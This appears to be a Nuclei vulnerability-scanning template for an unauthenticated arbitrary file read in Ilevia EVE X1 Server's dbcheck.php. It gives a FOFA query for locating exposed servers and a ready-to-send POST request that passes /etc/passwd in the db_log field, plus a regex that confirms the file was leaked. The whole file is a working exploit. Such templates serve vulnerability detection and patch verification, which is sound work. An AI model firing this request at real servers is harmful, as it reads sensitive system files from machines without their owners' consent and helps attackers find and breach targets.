id: Ilevia-EVE-X1-Server-dbcheck_php-File-reading

info:
  name: Ilevia EVE X1 Server dbcheck.php 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="ilevia-EVE-X1-Server"
    Ilevia EVE X1 Server dbcheck.php接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/q8k2T6jLmb_1crL2tCer1Q
  tags: File reading

http:
  - raw:
      - |
        POST /ajax/php/dbcheck.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        db_log=/etc/passwd
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0'
      - type: status
        status: 
          - 200